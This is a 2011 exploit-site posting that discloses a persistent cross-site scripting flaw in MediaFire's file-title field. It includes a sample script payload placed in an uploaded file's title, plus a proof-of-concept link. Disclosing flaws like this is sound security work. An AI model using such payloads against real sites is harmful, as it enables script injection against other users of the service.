Home / exploits MediaFire Cross Site Scripting
Posted on 21 August 2011
######################################################## | Title : MediaFire (mediafire.com) Persistent XSS | Author : Codeine | Email : f3codeine[at]yahoo[dot]com | Site : http://infosecforums.com/ | Date : 08/21/2011 | Cat : PHP[XSS] | URL : http://mediafire.com/ ######################################################## Mediafire.com suffers from a persistent XSS vulnerability within its file uploads. After a user has uploaded their file they can change the title of the file. To something like <script>alert('CodeineIntra')</script> .txt It must contain an extension to save. This is a persistent vulnerability. POC: http://www.mediafire.com/?c3kso7cqsmltafy _________________________________________________________________________________ Greetz Hidden Ninja All Of Team Intra
